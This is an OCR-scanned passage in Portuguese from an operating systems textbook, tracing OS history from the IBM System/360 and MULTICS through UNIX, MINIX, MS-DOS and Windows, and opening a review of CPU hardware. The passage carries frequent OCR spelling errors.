A IBM temou rcsolver esscs problemas de uma uni- 
ca vez imroduzindo o System/360. O 360 era uma serie 
de maąumas — desde maquinas do porte do J401 ate as 
mais potem es que o 7094 — cujos softwares eram compa- 
tfveis. Os equipamentos divergiam apenas no preęo e no 
desempenho (quantidade maxima de memória, yelocidade 
do processador, numero dc dispositivos de E/S permilidos 
etc.). Como todas as maąuinas linham a mesma arquite- 
lura c o mesmo conjunto dc instruęocs, os programas cs- 
critos para uma maąuina podiam ser executados em todas 
as on tras. pdo menos teoricamente. Alem disso, o 360 era 
voltado tamo para a computaęao cieniffica (isto t nu me- 
rica) ąiianto para a comercial. Assim, uma unica familia 
de maquinas poderia satisfazer as necessidades de todos os 
clientes. Nos anos subsequentes, a IBM Ianęou sucessivas 
serie s compatiVeis com a linii a 360, usa udo tecnologias 
mais modernas, conhecidas como series 370, 4300, 3080 
e 3090. O Z series e o mais novo dcsccndente dessa lin ha, 
embora tenho sc afastado considcravelmente do odginał. 

O IBM 360 foi a primeira linha de computadores a usar 
circuitos integrados (Cis) em pequena escala, propician- 
do, assim, uma melhor relaęao custo-beneffcio em com- 
paraęao a segunda geraęao de maqulnas, construtdas com 
transistores mdividuais. Foi um sucesso instantaneo, e a 
ideia de uma familia dc computadores conipativcis logo foi 
adotada por iodos os outros labricames. Os descendentes 
dessas maquinas ainda estao cm uso nos ccntros dc com- 
pmaęao. Atualmente sao mais empregados para gcrcnciar 
imensos bancos de dados (por exemplo, para sistemas dc 
reservas aereas) ou como servidores para sites da Web, quc 
predsam processar milhares de requisięoes por segundo. 

O forte da ideia de familia de maquinas' era simulto- 
neamente sita maior fraąueza. Aintenęaoera que qualquer 
software, inclusivc o sistema opcracional OS/360, pudesse 
ser cxccutado cm qualqucr um dos moddos. O software 
predsava ser executado em sistemas peąuenos — que mui- 
tas vezes apenas substiuuam os 140 J na tramferencia de 
cartoes perfurados para Fita magnetica —- e em sistemas 
muito grandes, que frequemememe substitufam os 7094 
na previsao do tempo e em outras operaęóes pesadas. Ti- 
nha de ser eficiente tamo em sistemas com poncos perife- 
ricos como nos com muitos perifericos. Tinha dc funcionar 
bem cm a mb i e mes comerdais e em ambientes denifficos, 
E, acima dc tudo, o sistema opcradonal predsava provar 
ser cficaz cm todos esses diferentes nsos. 

Nao havia como a IBM (ou quaiquer outro fabricante) 
elaborar um software que resolvesse todos esses requisitos 
conflitames, O resultado foi um sistema opcracional enor- 
me e extraordinariameme complexo, provavelmente duas 
oit tres vezes maior quc o FMS. Eram milhóes de linlias 
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escritas em linguagem assembly por milhares de progra- 
madores, contendo milhares de erros, que prerisavam de 
um fluxo continua de novas versoes para ten tar corrigi-los. 
Cada nova versao cortigia alguns erros, mas introduzia ou- 
tros, [azcndo com que, provavdmcnte, o mi mer o dc erros 
permanctessc eonstantc a o longo do tempo. 

Um dos pruje List as do OS/360, Fred Brooks, escreveu 
um livro genial e crftico (Brooks, 1996), descrevendo su as 
experiencias nesse projeto. Embora seja impossiYel resumir 
o conteiido do livro aqui, basta dizer que a capa mostra um 
rebanho de animais prć-históricos presos cm um fosso. A 
capa do livro de Silberschatz et al. (2005) faz urna analogia 
parccida entre sistemas operacionais c dinossauros* 

Apesar de sen enorme tamanho e de sens problemas, o 
OS/360 e os sistemas operacionais similares de terceira gera- 
ęao elaborados por outros fabricantes de computadores aten- 
diam razoavdmente bem a maioria dos dientes, Tambem 
popularizavam varias tecnicas fundamentais ausentes nos 
sistemas operacionais dc segunda geraęao. Frovavelmente a 
mais importante dessas tecnicas foi a multiprogramaęao. 
No 7094, ąuando a tarefa atual parava para esperar por urna 
lita magnetica terminar a transferencia ou aguardava o ter- 
mino de outra operaęao de E/S, a CPU simplesmente perma- 
necia ociosa ate que a E/S terminasse. Para calculos cientffl- 
cos com uso inienso do processador (CPU-homid), a E/S era 
pouco freąuente, de modo que o tempo gasto com ela nao 
era significativo. Para o processamento de dados comerriais, 
o tempo de espera pela E/S chegava a 80 ou 90 por cent o do 
tempo total (IO-bmnd) f de modo quc algo predsava ser feito 
para cvitar quc a CPU ficassc ociosa todo esse tempo. 

A soluęao a que se cliegou foi dividir a memória em 
varias parłeś, com urna ta refa diferente em ca da partięao, 
conforme mostrado na Figura 1.3. Enquanlo urna tarcia 
esperava que urna operaęao de E/S se completasse, outra 
poderia usar a CPU, Se um numeru sufidente de tarę- 
fas pudesse ser mantido na memória ao mesmo tempo, a 
CPU poderia permanccer ocupada porąuasc 100 porcento 
do tempo. Manier multipias tarefas dc maneira segura na 
memória, por su a vcz, requeria um hardware espedal para 
protcgcrcada tarefa contra danos e transgressoes causados 
por oiuras tarefas, mas o 360 e outros sistemas de terceira 
geraęao eram equipados com esse hardware. 



I Figura 1.5 Um sistema de multiprogramaęao com tr&s 
tarefas na memória. 


Outro aspecto importante nos sistemas operacionais de 
terceira geraęao era a capaddade de transferir tarefas de 
cartdes perfurados para discos magneticos logo que esses 
chegassem a sala do computador. Dessa forma, assim que 
urna tarefa fosse complcrada, o sistema operadonal poderia 
carregar uma nova tarefa a partir do disco na partięao quc 
acabou dc ser liberada e, entao, processa-lo. Essa tccnica 
e denominada spooling (termo derivado da expressao si- 
mulmeous peripkeral operatbn online) e tambem foi usada 
para arbitrar a safda. Com o spooling, os 1401 nao eram 
mais necessarios, e muito do leva e traz de fuas magneticas 
desapareceu. 

Embora os sistemas operacionais dc terceira geraęao 
fossem adcąuados para grandes calculos dentfficos e pro- 
cessamento macięo de dados comerriais, eram basicamcn- 
te sistemas em lote (batch Systems). Muitos program a do res 
semiam saudades da primeira geraęlo, qtiando podiam 
dispor da maquina por algumas horas, podendo assim cor- 
rigir seus programas mais rapidamente. Com os sistemas 
de terceira geraęao, o intervalo de tempo entre submeter 
uma tarefa e obter uma safda normalmente era de muitas 
horas; assim, uma unica virgula errada poderia ca usar um 
erro dc compilaęao, c o programador gastaria metade do 
dla para corrigi-lo. 

O anseio por respostas mais rapklas abriu caminbo 
para o tempo compartilhado ou timesharing, unia varian- 
te da multiprogramaęao na quai cada usuario se eonectava 
por meio de um terminal on-line. Em um sistema de tem¬ 
po compartilhado, se 20 usuarios estivessem conectados e 
17 dclcs estivessem pensando, falando ou tomando cafe, 
a CPU podia ser cielicamente alocada a cada uma das tres 
tarefas quc cstivcsscm reąuisitando a CPU, Como, ao depu- 
rai programas, einUem-se normalmente comandos curtos 
(por exemplo, compile mna rot i na 1 de cinco paginas) em 
vez de comandos longos (por exemplo, ordene um arqui- 
vo de um mil ha o de registros), o computador era capaz de 
fornecer um servięo rapido e imerativo a varios usuarios 
e ainda processar grandes loies de tarefas em backgroimd 
(segundo piano) nos instantes em que a CPU estivesse 
ociosa. O primeiro sistema importante de tempo compar- 
tilhado, o CTSS (wmpatibk time sharing system — sistema 
compatiYcI de tempo compartilhado, foi deseńvolvido no 
MIT em um 7094 modificado (Corbató ct al., 1962). Con- 
Uido, o tempo compartilhado só se popularizou duranie a 
terceira geraęao, periodo em que a necessaria proteęao em 
hardware foi largatneme empregada. 

Dcpois do sucesso desse sistema (CTSS), o MIT, o 
Bell Labs e a General Electric (entao um dos grandes fa¬ 
bricantes de computadores) dcddlram deseńvolvcr um 
'computador utilnarioL uma maąuina quc suportasse si- 
multaneamente cenlenas de usuarios companilhando o 
tempo. Basearam-se no modelo do sistema de distribuięao 
de eletricidade, ou seja, quando se precisa de energia ele- 


UtiliMrenioH os termos roiin^, 'pmcedimtfnto', 'sub-roima' e 'funęatC tudist i mamonie ao \tm$o desie ]ivm. 
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trica, coneaa-se o pino na tornada da parede e, nao ha- 
vendo nenhum problema, tem-se tanta energia ąuanto e 
necessaria Os projetistas desse sistema, conhecido como 
MULTICS {Multjptexed mformation and compuiing semce*— 
servięo dc computaęao e de hiforniaęao mu!tiplexada), 
iinaginaram urna enormę maąuina fomecendo 'energia' 
eompuiadonal para loda a area de Boston. A ideia deque 
maąuinas nuiito mais potentes que o compuiador de gran¬ 
dę porte GE-645 fosseni vendidas por mil dólares para 
niilhoes de pessoas, apenas 40 anos mais tarde, era ain- 
da pura ficęao ciemifica. Seria como imaginar, hpje, trens 
submarmos trans at la nticos e su person! cos. 

O MULTICS foi projctado para suportar ccnlcnas dc 
usuarios cm u ma unica maąuina somente urn pouco mais 
potenie que um PC baseado no 586 da Intel embora tendo 
muiio mais capacidade de E/S, Isso nao ć tao absurdo quan- 
to parece, ja que, naąuelcs dias, sabia-sc cscrcvcr progra- 
mas peąuenos e eficientes — unia habilidade quc se vem 
perdendo a ca da dia. Havia muitas razóes para que o MUL¬ 
TICS nao dominasse o mundo; u ma ddas era sua codifica- 
ęao em PL/I. O compilador PL/I chegou com anos dc atraso 
c, ąnando isso a co nt cccii, dificilincntc funrionava, Alćm 
disso, o MULTICS era muito ambidoso para sen tempo, 
tanio quanto a maąuina analnica de Charles Babbage no 
sćculo XIX. Apesar disso tudo, pod cni os di zer quc a ideia 
lanęada pelo MULTICS foi bem-sucedida, 

Para resumir a historia, o MULTICS iutroduziu muitas 
ideias se mi na is na literatura da compulaęao, mas tornado 
um prodmo serio c um grandę sucesso comercial era muito 
mais diffcil do que se pensava + O Bell Labs retirou-se do 
p roje to e a General Electric saiu do negócio de compmado- 
res, Contudo, o MIT persistiu c fmalmenlc fez o MULTICS 
fundonar. Ele foi, enlao, veiidido como prodmo comer¬ 
cial pela einpresd que comprou o ncgócio de computadores 
da GE (a Honeywell) e instalado em cerca dc 80 grand es 
empresas e umvcrsidades pelo mundo. Apesar dc pouco 
numerosos, os usuarios do MULTICS eram cxtrcmamen¬ 
ie leais. A General Motors, a Ford e a Agenda dc Scgu- 
ranęa Nacional dos Eslados Unidos (U,S. National Security 
Agcncy), por exemplo, somente desligaram scus sistemas 
MULTICS no finał dos anos 1990, tres decadas depois de 
seu lanęamento, após anos de tentativas para que a Hon- 
eywell atualizasse o hardware. 

Por ora, o conccito dc 'computador utililario' perma- 
nece adormeddo, mas pode muito bem ser trazido de volta 
na forma de poderosos servidoresde Internet centralizados, 
nos ąuais maąuinas usuarias mais simples sao coneetadas, 
com a maior parte do trabalho acontccendo nesses grandes 
serddores, A motivaęao para isso e que, possivelmeme, a 
maioria das pessoas nao pretende administrar um sistema 
cuja complexidade e crcscente c cuja operaęao toma-se 
cada vcz mais meticulosa, c r assim, sera prefcrivcl quc cssa 
larcfa seja realizada por urna cąuipe dc profissionais tra- 
balhando para a empresa que opera o scrvidor. O corrter- 


cio eietronico (e-commerce) ja esta evoluindo nessa direęao, 
com varias empresas no papel de centros comerciais eletro- 
nicos (e-malis) em servidores multiprocessadores aos ąuais 
as maąuinas dos Client es se conectam, no melhor espfrito 
do projeto MULTICS. 

Apesar da falta de sucesso comercial, o MULTICS cxer- 
ceu urna enorme influencia sobre os sistemas operacionais 
subseąitemes. O MULTICS esta descrito em Corbató et al 
(1972), Corbató e Vyssot$ky (1965), Daley e Dennis (1968), 
Organick (1972) e Saltzer (1974). Existe um sile da Web, 
<www ł multidans t org>, com muita informaęao disponwd 
sobre o sistema, scus projetistas c scus usuarios. 

Ouiro grandę desenvolvimento ocorrido durante a ten 
ceira geraęao foi o fenomenal crescimento dos minicompu- 
tadores, iniciado com o DEC PDP-1 cm 1961, O PDP-i ti- 
nha somente 4 K de palavras de 18 bits, mas cada maąuina 
custava 120 mil dólares (menos dc 5 porcento do preęo de 
um 7094) c r mesmo assini, vendia como agua. Para ccrtos 
tipos de aplicaęóes nao numericas, era tao rapido ąuanto 
o 7094 c deu origem a loda urna nova industria. Rapida- 
mente foi seguido por uma serie de outros PDPs (diferen- 
temente da familia IBM, todos incompatfveis), culminando 
no PDP-IL 

Ken Thompson, um dos cieniisias da computaęao do 
Bell Labs que trabalharam no projeto MULTICS, achou 
um peąueno minicompuiador PDP-7 que ninguem estava 
usando c aproveiiou-o para escrever urna versao despojada 
e monousuario do MULTICS. Esse trabalho deseńvolveu-se 
e deu origem ao sistema operacional UNEX' e , que se tornou 
muito popular no mundo academico, em agencias gover- 
namcmais e em muitas empresas, 

A historia do UNfX ja foi contada em outros lugares 
(por exemplo, Salus, 1994), Parte dessa historia sera re- 
coniada no Capitulo 10. No momento, basta dizer que, cm 
yirtude dc o código-fontc ter sido amplamentc divulgado r 
varias organizaęoes desenvolveram suas próprias (e ineom- 
pattvcis) vcrs6cs r o que levou ao caos, Duas das prindpais 
versoes deseńvolvidas, o System V, da ATfrT, c o BSD 
(Berkeley software distńhutkm — distribii ięaa dc software 
de Berkeley), da UnWersidade da Califórnia em Berkeley, 
tambem possuiam variaędes menores. Para Lornar posswel 
escrever programas quc pudessem ser exccutados em qual- 
qucr sistema UNTX, o IEEE deseńvolveu um padrao para 
o UNIX denominado POSIX (portabk operatimj system in¬ 
terfazę — iiiierface portali! para sistemas operacionais, ao 
qual a maioria das versóes UNIX agora da suporte, O PO- 
SIX define uma imerface minima de cha mada de sistema a 
que os sistemas cm eon form ida de com o UNIX devem dar 
supone. Na verdade, alguns outros sistemas operacionais 
agora tambem dao suporte a imerface POSIX. 

Como comentario adkiooat vale men don ar que, cm 
1987, o autor deste livro lanęou um peąueno clone do UN1X, 
denominado MINIX, com objetwo educacional Fundo- 
nalrnente, o MINTX e muito s i mi lar ao UNIX, induindo o 
suporte ao POSIX. Desde entao, a versao original evoluiu 
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para MINIX 3, que e ahamente modular e confiaveL Ela tem 
a capacidade de detectar e substituir rapidamente módulos 
defeituosos ou mesmo danificados (como drivers de disposi- 
tivo de E/S) scm reinidalizar c sem perturbar os programas 
cm execuęao. Ha urn livro quc descreve sua opcraęao inter¬ 
na c que traz a listagem do código-fonte cm seu apendke 
(Tancnbaum c WoodhulL 1997^ O sistema M1NTX 3 esta 
disponivd gratuitamente (com o código-fonte) pcla Internet 
em <www.minix3.org>. 

O desejo de produzir urna versao gratuita do MINIX 
(diferente da educacional) ievou mii estndante finlandes, 
linus Tonalds, a cscrevcr o Linux. Essc sistema foi dii eta - 
mente inspirado c dcscnvolvido a partir do MIN1X c origi- 
nalmentc suportou varios de scus aspcctos (por excniplo, o 
sistema dc arquivos do MJNIX}, Ele tem sido eslcndido de 
varias ntaneiras, mas ainda mantem urna grandę parte da 
estrutura comum ao MINIX e ao UNIX. Os leitores imeres- 
sados em urna historia detalhada do Lmux e do movimemo 
de fonte aberta po dem querer ler o livro de Glyn Mood 
(2001). A malaria do qne e dito sobre o UN1X nesse livro se 
aplica ao System V, ao BSD, ao MIN1X, ao Unux e a o u tras 
yersoes e clones do UN1X tambem. 

_ 1-2.41 A quarta geraęao (1980-presente) - 

computadores pessoais 

Com o desenvo!vimento de cireuitos im eg rad os em 
larga e scal a (large scalę hit eg mmi — LSI), que sao chips 
contendo milhares dc transistores em urn centmictro qua- 
drado de silfcio, surgiu a era dos computadores pessoais. 
Em termos de arąuitetura, os computadores pessoais (ini- 
cialmentc denominados microcomputadores) na o cram 
muito difcrcmcs dos mi ni computadores da dasse PDP-11, 
mas no preęo cram da ra men te diferentes. Sc o mulicom - 
putador tomou possivel para lim deparlainento, uma em- 
presa ou uma univer$idade terem seu próprio computador, 
o chip microprocessador tomou posswel a urn indmduo 
qualquer ter seu próprio computador pessoal. 

Em 1974, a Intel lanęou o 8080, a primdra CPU dc S 
bils de uso gcral, e buscava urn sistema operacional para o 
8080, em parte para testa-lo. A Intel pediu a urn de seus 
consultores, Gary Kildall, para escreve-lo. Kildall e urn 
amigo inicialmente conscrunram urn comrolador para a en¬ 
tao recemdanęada unidade de discos flexfveis de 8 pole* 
gadas da Slutgart Associates e a utilizaram com um 8080, 
produzindo, assim, o primeiro microcomputador com uni¬ 
dade de discos flexfveis. Kildall entao escreveu para cle um 
sistema operacional baseado em disco denominado CP/M 
(control program for microcomputers — program a dc com ro¬ 
le para microcomputadores). Como a Intel nao acrcditava 
que microcomputadores baseados cm disco tivessem muito 
futuro, Kildall reąuisitou os direitos sobre o CP/M e a Intel 
oscedeu. Kildall formou entao uma empresa, a Digital Re¬ 
search, para aperfeięoar e vender o CP/M. 


Em 1977, a Digital Research reescreveu o CP/M para 
torna-lo adequado a execuęao em muitos microeomputa- 
dores utilizando 8080, Zilog Z80 e outros mtcroproeessado- 
res. Muitos programas aplicativos foram escritos para se¬ 
rem cxecutados no CP/M, permitindo que cle dommasse 
completa menie o mundo da rmcrocomputaęao por certa 
de dneo anos. 

No imcio dos anos 1980, a IBM projetou o IBM PC e 
buscou um software para ser executado nele. O pessoal da 
IBM entrou cm contato com Bill Gates para licenciar seu in- 
terpretador Basic. Tambem Ibc foi indagado sc cle conhccia 
algum sistema operacional quc pudesse ser executado no 
PC. Gates sugeriu quc a IBM comatassc a Digital Research, 
a empresa que dominava o mundo dos sistemas operado- 
nais naqucla cpoca. Tomando seguramentc a piór dedsao 
dc uegócios regislrada na historia, Kildall rccusou-sc a sc 
rcunir com a IBM, ctmando em seu lugar um subordina- 
do. Para piorar, o advogado dele foi contra assinar um acordo 
de sigilo sobre o PC que ainda nao havia sido dmilgado, 
Consequentemente, a IBM voltou a Gates, perguntando- 
-Ihc sc seria possfyd fornecer-llics um sistema operacional 

Entao Gates percebeu que uma fabrieante local de com¬ 
putadores, a Seattle Computer Products, possma um siste- 
ma operacional adequado, o DOS {di$k operating system 
sistema operacional dc disco), Entrou em contato com cssa 
empresa c disse que ąueria compra-la (suposiamente por 
75 mil dólares), o que foi prontamente a celto. Gates ofe- 
receu a IBM um pacote DOS/Basic, e ela aceitou, A IBM 
quis fazer algumas modificaęoes, e para isso Gates contra- 
Uhi a pessoa que tinha escrito o DOS, Tim Paterson, como 
funcionario da empresa embrionaria de Gates, a Microsoft. 
O sistema reyisado teve seu nonie mudado para MS-DOS 
{Microsoft disk operdting system — sistema operacional de dis¬ 
co da Microsoft) e rapidamente viria a dominar o mercado 
do IBM PC. Um fator dcdsivo para isso foi □ dedsao de Gates 
(agora, olhando o passa do, cxtrc ma mente sabia) de vender 
o MS-DOS para empresas de computadores acompanhan- 
do o hardware, em vez de tentar vender diretamente a os 
usuarios fi na i s {pelo me nos imcialmente), como Kildall 
teiilou fazer com o CP/M. Depois de todos esses aconte- 
cimemos, Kildall morreu repem i na e inesperadamente de 
causas que nao foram completa men te revdadas. 

Quando, em 1983, o sucessor do IBM PC, o IBM 
PC/AT, foi lanęado utilizando a CPU Intel 80286, o MS- 
DOS avanęava firmemente ao mesmo tempo que o CP/M 
definliava. O MS-DOS foi, mais tarde, tambem amplamen- 
te lisa do com o 80386 e o 80486. Mesmo com urna versao 
inicial bastante primitiva, as versoes subsequentes do MS- 
DOS inclutram aspectos mais avan^ados, muitos deles de- 
rivados do UNIX, (A Microsoft conhecia bem o UNIX, pois, 
nos primeiros anos da empresa, vendeu uma vcrsao para 
microcomputadores do UNIK, denomirtada XENIX.) 

O CP/M, o MS-DOS e outros sistemas operadonais dos 
primeiros microcomputadores eram todos baseados na di- 
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gitaęao de comandos em lim tedado, feita pelo usuario. 
Isso Rnalmente mudou graęas a um trabalho de pesquisa 
de Doug Engelbart no Stanford Research Institiite nos anos 
1960, Engelbart iiwentou unia interface grafica completa —- 
voltada para o usuario — com jandas, fcones, mcnus e 
mouse, denominada GUI igrapkicat user interface). Essas 
ideias dc Engelbart foram adotadas por pcsqiiisadorcs do 
Xciox Parce intorporadasas maquinasąuceles projetaram. 

Um dla, Steve Jobs, que coinventou o computador Ap¬ 
ple na garagem de sua casa, visLtou o Parć, viu urna imerfa- 
ce grafica GUI e instantaneamente percebeu seu potendal, 
algo que a gerenda da Xerox reconheddamente nao tinha 
feito, Essc cno de proporęao gigantesca levou a elabora- 
qao do livro Fumbłing the futurę (Smith e Alexandcr, 1988), 
Jobs entao inirfou a construęao de um Apple dispondo de 
urna interface grafica GUI. Essc projeto, denominado Lisa, 
foi muito dispendioso e falliou comerdalmente. A segun- 
da tentaiiva de Jobs, o Apple Macintosh, foi um enorme 
sucesso, nao somente por seu custo muito menor que o 
do Ltsa, mas tambem porquc era mais amigavel ao usua¬ 
rio, destinada a usuarios que nao só nada sabiam sobre 
computadores, mas tambem naotinham a menor imenęao 
de um dla aprender sobre eles. No mundo criativo do de¬ 
sign grafiko, da fotografia digilal profissional e da produęao 
profissiona! de vfdeos digiiais, os compuladorcs Macintosh 
sao amplamente empregados e os usuarios sao seus gran- 
des entusiastas. 

Quando a Microsoft decidiu elaborat um succssor para 
o MS-DOS, estava fortemente influenciada pelo suces- 
so do Macintosh. Deseńvolveu um sistema denominado 
Windows, baseado na interface grafica GUI, que era execu- 
tado originalmente em dnia do MS-DOS (isto e, era como 
se fosse um interpretador de comandos — shell — em vez 
de um sistema operacional de verdade). Por aproximada- 
mente dcz anos, dc 1985 a 1995, o Windows permane- 
ccu apenas como um ambientc grafico sobre o MS-DOS, 
Contudo, cm 1995 lanęou-sc unia vcrsao do Windows in- 
dependente do MS-DOS, o Windows 95, Ncssa vcrsao, o 
Windows incorporou mititos aspcctos dc um sistema ope¬ 
racional usando o MS-DOS apenas para ser carregado e 
exeeuiar programasantigos do MS-DOS. Em 1998, Ianęou- 
-se urna versao levemente modificada desse sistema, clia- 
mada Windows 98. No entanto, ambos, o Windows 95 e o 
Windows 98, ainda continham urna grandę quantidade de 
código em iinguagem assembiy de 16 bits da Intel. 

Outro sistema operacional da Microsoft e o Windows 
NT (NT c urna sigla para new technology) t que e compaitve] 
com o Windows 95 em um certo mvel mas reescrito inter- 
namente por completo. £ um sistema de 32 bits com pieto. 
O lider do projeto do Windows NT foi David Cutier, que 
foi tanibem um dos projetistas do sistema operacional VAX 
VMS, c, por isso, algumas ideias do VMS estao presentes 
no NT. Na realidadc, havia tantas ideias do VMS no sistema 
quc a proprietaria do VMS, a DEC, proccssou a Microsoft. 
As pancs entraram cm acordo sobi e o caso por u ma cnor- 


me ąuantia de dinheiro. A Microsoft esperava que a pri- 
meira versao do NT 'aposentasse' o MS-DOS e todas as ou- 
tras versoes do Windows, ja que o NT era muito superior, 
mas isso nao aconteceu. Somente com a versao Windows 
NT 4.0 foi que cle finalmcnte deslanchoii, especialmcnte 
cm redes corporativas, A vcrsao 5 do Windows NT foi reno- 
mcada Windows 2000 no infcio dc 1999* Scu objetwo era 
sucedcr tanto o Windows 98 quamo o Windows NT 4.0. 

Essa versao tambem nao obteve exito, e entao a Micro¬ 
soft lanęou mais uma versao do Windows 98, denomina¬ 
da Windows Me (Millennium edition). Em 2001, uma 
versao llgciramcntc atualizada do Windows 2000, chamada 
Windows XP, foi lanęada* Essa vcrsao tevc duraęao muito 
inaior (seisanos), substituindo basicamcnte todas as versoes 
anteriores do Windows, Em jandro dc 2007, a Microsoft fi¬ 
nał menie lanęoii o succssor do Windows XP, cha mado Vis- 
ta. Ele apresemou uma nova interface grafica, Aero, e mui- 
tosprogramas de usuario novos ou amalizados. A Microsoft 
espera qne ele substilua o Windows XP completamente, 
mas esse processo pode Ievar a maior parte da decada. 

O outro grandę competidor no mundo dos computa- 
dores pessoais e o UN1X (e sens varios derivados). O UNIK 
e o mais forte em servidores dc rede e empresariais, mas 
esta cada vez mais presenic em desktops, cspecialmenie em 
pafses em rapido deseń volvimento como India e Chi na. Em 
computadores baseados em Pentium, o Linux esta se tor- 
nando uma alternativa popular para esludantes e um cres- 
cente numero de usuarios corporativos. Como comentario 
adicional por todo o livro usarcmos o termo 'PemiunT 
para Pentium L IL III e 4, bem como para seus sucessorcs, 
como o Core 2 Duo. O termo x86 tanibem e usado algumas 
vezespara indiear toda a serie de CPUs Intel quc remomam 
ao 8086, ao passo que 'Pentium' sera utilizado para sigm li¬ 
ca r todas as CPUs do Pentium I em dianie* Ć bem vcrdade 
quc esse termo nao e perieito, mas nao ha outro melhor 
disponfyel. Dcvc-se tentar imaginar quem foi o genio do 
markcling da Intel que descarlou uma marca (Pentium) 
quc meiade do mundo conhecia bem c respeitava e a subs- 
tituiu por termos como 'Core 2 duo', que poucas pessoas 
compreendem — pense rapido, o que significa o *T e o que 
quer dizer Tluo7 Talvez 'Pentium 5' (ou 'Pentium 5 dual 
core' etc.) fosse difiril demais de lembrar. FreeBSD tam¬ 
bem c um derivado popular do UNfX, originado do projeto 
BSD em Berkeley. Todos os computadores Macintosh mo¬ 
dernos ex ecu tam uma versao modificada do FreeBSD. O 
UNIX tambem e padrao em estaęoes de trabalho eąuipadas 
com chips RISC de alto desempenho, como os vendidos 
pela Hewlett-Packard e pda Sun Microsystems. 

Muitos usuarios do UN1X, especialmente programa- 
dores experientes, preferem uma interface baseada em 
comandos para urna GUI, de forma que quase todos os 
sistemas UNIX dao su porte a um sistema de jandas deno- 
minado X (X Windows, tambem conherido como XII) 
produzido no MIT, Esse sistema trata o gerenciamento ba- 
sico dc jandas de modo a permitir que usuarios criem, re- 
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movam, movam e redimensionem as janelas usando um 
mouse. Muitas vezes inna interface grafica GUI eompleta, 
como o Gnomę ou KDE, esta dispomvel para ser execu- 
tada cm ci ma do sistema X Windows, da udo ao UN1X a 
aparenda do Macintosh on do Microsoft Windows, para 
aqudes usuarios UNIK que assim o dcsejartm 

Um falo interessame, quc tevc inicio cm mcados dos 
anos 1980, foi o dcscnvolvinicnto das redcs dc computado- 
rcs pessoais execmando sistemas operacionais de rede 
e sistemas operacionais distribuidos (Tanenbaum e 
Van Stecu, 2002). Em um sistema operacional de redes, os 
usuarios sabem da existenda dc multiplos computadores e 
podem ęonectar-se a maquinas remotas e copiar arquivos 
dc urna maąuina para outra. Cada maąuina cxecuta seu 
próprio sistema operacional iocal c tern sen prdprio usuario 
local (ou usuarios locais). 

Sistemas operacionais de rede nao sao fundamental¬ 
na eme diferent.es de sistemas operacionais voltados para 
um unico processador: des obdamente predsam de um 
controlador dc interface dc rede c dc algum software dc 
baixo nivel para cant rola-la, bem como dc programas para 
conseguir sessbes rcmotas e tambem ter acesso rcmoto a 
arquivos r mas esses acrescimos nao altcram a estru tura cs- 
sencial do sistema operacional. 

Um sistema operacional disiribuido, por outro lado, 
e aquele qtie parece aos olhos dos usuarios um sistema 
operacional tradicional monoprocessador, mesmo que na 
realidade seja composto de multiplos processadores. Os 
usuarios nao precisam saber onde sens programas estao 
sc udo exccutados nem onde scus arquivos estao localiza- 
dos, pois tudo e tratado automatica c didciitcmcmc pdo 
sistema operacional. 

Os verdadeiros sistemas operacionais distribuidos re- 
ąuereni muito mais do que apenas adicionar algum código 
a um sistema operacional monoprocessador, pois os siste¬ 
mas distribuidos e ccntralizados sao muito difcrcmes cm 
pontos fundamentais. Por cxempIo r c cominii que sistemas 
distribuidos permitam que aplicaęoes seja ni executadas cm 


varios processadores ao mesmo tempo, o que exige algoriunos 
mais comp]exos de esca łona niemo dc processadores para 
otimizar o paralclismo. 

Atrasos de comunicaęao na rede muitas vezes signifi- 
cam que esses {e omros) algoriunos devam ser executados 
com informaęoes ineompletas, desatualizadas ou ate mes¬ 
mo incorretas* Essa situaęao e radicaimente difereme de 
um sistema monoprocessador, cm que o sistema operacio- 
nal tern toda a informaęao sobre o estado do sistema. 



Revisao sobre hardware de 
computadores 


Um sistema operacional esii intimanienie Itgado 
ao hardware do computador no qual de e executado. O 
sistema operacional estende o eon junto de instruęoes do 
computador e gerenda seus recursos. Para funcionar, ele 
deve ter um grandę conhccimento sobre o hardware, pelo 
menos do porno de vista do program a don Por isso, revisa- 
remos brevememe o hardware tal como e encontrado nos 
computadores pessoais modemos. Em segihda, podemos 
entrar em de ta Ih es sobre o que fazem os sistemas operado- 
nais e como funcionam. 

Conceitualnieme, um computador pessoal simples 
pode ser abstrafdo para um modelo semdhante ao da Fi¬ 
gura Ló< A CPU, a memória e os dispositivos dc E/S estao 
todos concclados por um barramento, quc proporciona a 
comunicaęao de mis com os outros. Computadores pes¬ 
soais modern os possuem unia estru tura mais complexa, 
que envolve multiplos barramentos, os quais veremos de- 
pois. Por enąuanto, o modelo apresentado e sufideme. Nas 
seęoes a seguir, revisaremos rapidameme eada um desses 
componentes e examinaremos algum topi cos de hardware 
de interesse dos projctislas dc sistemas operacionais. Nao 
e predso dizer quc se trata de um resumo muito brevc. 
Muitos livros sobre o tema hardware e organizaęao de 
computadores foram escrilos. Dois basta nie conheddos sao 
Tanenbaum (2006) e Patterson e Hennessy (2004). 


Monitor 



Barramento 


I Figura 1.6 Alguns dos componentes de um computador pessoal simples. 
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1-5-1 I Processadores 

O 'cerebro' do computador e a CPU. Ela busca instru- 
ęóes na memória c as executa. O ciclo hasko dc execuęao 
dc qualquer CPU e: buscar a pri metra instruęao da memó¬ 
ria, decodilka-la para deierminar sens opcrandos c qual 
operaęao cxccutar com csses, cxecuta-la e cntao buscar, 
decodifkar e executar as instmęoes subseąucntes. O ciclo 6 
repctido ale quc o pro gra rna parę, £ dessa maneira quc os 
programas sao execotados. 

Cada CPU Lem um co nj unio espedfieo dc instruęoes quc 
ela pode exeouar. Assim, um Pentium nao executa progra¬ 
mas SPARC, nem urna SPARC consegue execuiar programas 
Pentium. Como o tempo de acesso a memória para buscar 
urna instruęao ou operando e muito menor que o tempo 
paro cxccuta-la, todas as CPUs tern registradores inter- 
nos para armazenamento de variaveis miportantes e de re- 
suliados lemporarios. Por isso, o conjunto de instruęoes ge- 
ralmenie contem insiruęoes para carregar urna palavra da 
memória em um registrador e armazener urna palavra de 
um registrador na memória. Oulras insiruęoes combi nam 
dois opcrandos provenicntes de rcgistr adorcs, da memória 
ou dc ambos, produzindo um rc suita do, como adicionar 
duas palavras e armazenar o resultado em um registrador 
ou na memória. 

Alem dos registradores de propósito geral, usados para 
conier variaveis e resultados lemporarios, a maioria dos 
computadores tem yarios registradores espedais visiveis ao 
programador. Um ddes e o contador de programa, que 
contem o endereęo dc memória da próxima instruęao a ser 
buscada. Dcpois da busca de uma instruęao, o comador de 
programa e atualizado para apontar a instruęao seguinte. 

Outro registrador especial e o ponteiro de pilha, que 
aponta para o topo da pilha atual na memória. A pilha con- 
